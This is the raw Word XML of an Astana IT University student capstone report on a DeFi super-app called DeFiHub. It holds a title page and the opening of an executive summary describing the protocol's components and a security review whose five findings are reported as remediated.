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33481B" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRPr="00884D18" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="177"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08620E7A" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="116"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Astana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>IT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>University</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(AITU)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D2098E" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="117"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487587840" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="084AE16A" wp14:editId="3BB65D40">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1810511</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>235614</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="485267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52670" cy="9525"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="4852670" h="9525">
                              <a:moveTo>
                                <a:pt x="4852416" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="9144"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="4852416" y="9144"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="48524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C93843" id="Graphic 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:142.55pt;margin-top:18.55pt;width:382.1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4852670,95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MO7BIwIAAL0EAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6L06CJGuNOMXQosOA oivQDDsrshwbk0WNUmLn70fJVmpspw3LwabMZ/q9RzLbu77V7KzQNWAKvpjNOVNGQtmYY8G/7R8/ 3HDmvDCl0GBUwS/K8bvd+3fbzuZqCTXoUiGjIsblnS147b3Ns8zJWrXCzcAqQ8kKsBWejnjMShQd VW91tpzPN1kHWFoEqZyjpw9Dku9i/apS0n+tKqc80wUnbj5eMV4P4ZrttiI/orB1I0ca4h9YtKIx 9NFrqQfhBTth80eptpEIDio/k9BmUFWNVFEDqVnMf1PzWgurohYyx9mrTe7/lZXP51f7goG6s08g fzhyJOusy6+ZcHAjpq+wDVgizvro4uXqouo9k/RwdbNebj6S2ZJyt+vlOpiciTy9K0/Of1YQ64jz k/NDD8oUiTpFsjcpROpk6KGOPfScUQ+RM+rhYeihFT68F8iFkHUTIvXIIyRbOKs9RJgPEgLb1WLD WRJCTN8w2kyxpGmCSrl0t7HegLldrFaj7JRO9wE2/exfgePIEsdUTmpwajA46I5OX70g3NRtB7op Hxutg3yHx8O9RnYWYTXib2Q8gcVJGJofxuAA5eUFWUf7UnD38yRQcaa/GBrIsFwpwBQcUoBe30Nc weg8Or/vvwu0zFJYcE+z8wxp3EWexoL4B8CADW8a+HTyUDVhZiK3gdF4oB2J+sd9Dks4PUfU27/O 7hcAAAD//wMAUEsDBBQABgAIAAAAIQBfKWKX4QAAAA8BAAAPAAAAZHJzL2Rvd25yZXYueG1sTE9L T8MwDL4j8R8iI3Fj6TbYStd0QiC4ohUO281tQlvRJCWPtduvxzvBxZbtz98j3066Z0flfGeNgPks AaZMbWVnGgGfH693KTAf0EjsrVECTsrDtri+yjGTdjQ7dSxDw4jE+AwFtCEMGee+bpVGP7ODMnT7 sk5joNE1XDociVz3fJEkK66xM6TQ4qCeW1V/l1ELiPLg9+O7d/hz9uf9qYnlWxWFuL2ZXjZUnjbA gprC3wdcMpB/KMhYZaORnvUCFunDnKAClmvqF0By/7gEVtEmXQEvcv4/R/ELAAD//wMAUEsBAi0A FAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54 bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJl bHNQSwECLQAUAAYACAAAACEAADDuwSMCAAC9BAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0Rv Yy54bWxQSwECLQAUAAYACAAAACEAXylil+EAAAAPAQAADwAAAAAAAAAAAAAAAAB9BAAAZHJzL2Rv d25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAIsFAAAAAA== " path="m4852416,l,,,9144r4852416,l4852416,xe" fillcolor="black" stroked="f">
                <v:path arrowok="t"/>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C55F01" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DAA213" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C887E5B" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="186"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABE06B8" w14:textId="77777777" w:rsidR="00884D18" w:rsidRPr="00884D18" w:rsidRDefault="00884D18" w:rsidP="00884D18">
      <w:pPr>
        <w:spacing w:before="350"/>
        <w:ind w:left="1" w:right="116"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>FINAL PROJECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE5E90C" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="350"/>
        <w:ind w:left="1" w:right="116"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Discipline:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Blockchain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Technologies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722A4461" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDA4F0F" w14:textId="77777777" w:rsidR="00884D18" w:rsidRDefault="00884D18" w:rsidP="00884D18">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Full-Stack Decentralized Protocol — Team Capstone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055233CD" w14:textId="10C3130B" w:rsidR="00884D18" w:rsidRPr="00884D18" w:rsidRDefault="00884D18" w:rsidP="00884D18">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Option A — DeFi Super-App</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19939AF2" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRPr="00884D18" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="32"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EABE904" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="324"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341713A6" w14:textId="4C817650" w:rsidR="00F032C3" w:rsidRPr="00884D18" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1436"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Completed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Dastan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,Nursultan,Akylbek</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74598EEF" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="79"/>
        <w:ind w:right="1435"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Group:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2424</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACD598B" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:ind w:right="1435"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Course:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2nd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F0E092" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="33"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE407ED" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="1436"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Supervisor:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Sayakulova</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zarina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0010BC22" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D0E1E33" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A946B2" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1609FCAC" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="182F1C71" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6262D93D" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0534F03A" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF0863C" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="585A893B" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="244F89AE" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A61AB9C" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30013985" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A085F7C" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E43EC6A" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED18C94" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="080ADD2A" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D34E1B" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00F032C3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="111"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD5CD7F" w14:textId="77777777" w:rsidR="00F032C3" w:rsidRDefault="00000000" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:right="116"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Astana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782B8223" w14:textId="77777777" w:rsidR="00B832C7" w:rsidRDefault="00B832C7" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:right="116"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A47C23A" w14:textId="77777777" w:rsidR="00B832C7" w:rsidRDefault="00B832C7" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:right="116"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16DF446E" w14:textId="77777777" w:rsidR="00B832C7" w:rsidRDefault="00B832C7" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:right="116"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F4EFB93" w14:textId="77777777" w:rsidR="00B832C7" w:rsidRDefault="00B832C7" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:right="116"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00346CC6" w14:textId="77777777" w:rsidR="00B832C7" w:rsidRDefault="00B832C7" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:right="116"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D61E16" w14:textId="77777777" w:rsidR="00B832C7" w:rsidRDefault="00B832C7" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:right="116"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1671D861" w14:textId="77777777" w:rsidR="00B832C7" w:rsidRDefault="00B832C7" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B30ADAC" w14:textId="77777777" w:rsidR="00B832C7" w:rsidRPr="00B832C7" w:rsidRDefault="00B832C7" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B0F0A6" w14:textId="77777777" w:rsidR="00B832C7" w:rsidRPr="004F09BE" w:rsidRDefault="00B832C7" w:rsidP="00B832C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DF7C1C" w14:textId="77FA9AC5" w:rsidR="004C355C" w:rsidRDefault="004F09BE" w:rsidP="004F09BE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>DeFiHub is a student-built DeFi super-application that bundles a constant-product automated market maker (AMM, x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>⋅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>y=k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>⋅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>, 0.3% swap fee), a collateralized lending pool with loan-to-value (LTV) limits, health-factor monitoring, and liquidation, an ERC-4626 yield vault, Chainlink compatible price oracles, and onchain governance via OpenZeppelin Governor + TimelockController over an ERC20Votes token. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088A425D" w14:textId="3A6146A2" w:rsidR="004F09BE" w:rsidRPr="004F09BE" w:rsidRDefault="004F09BE" w:rsidP="004F09BE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Upgradeability is demonstrated through UUPS proxies (UpgradeableProtocolConfig), and pool deployment is supported via a factory using both CREATE and CREATE2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5B9E87" w14:textId="77777777" w:rsidR="004F09BE" w:rsidRPr="004F09BE" w:rsidRDefault="004F09BE" w:rsidP="004F09BE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>This engagement combined automated analysis (Slither), Foundry unit/fuzz/invariant testing, and manual line-by-line review of in-scope production contracts. The review identified </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>two High</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>one Medium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>one Low</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>one Informational</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t> issue. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>All five findings have been remediated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t> in the audited commit lineage; proof</w:t>
      </w:r>
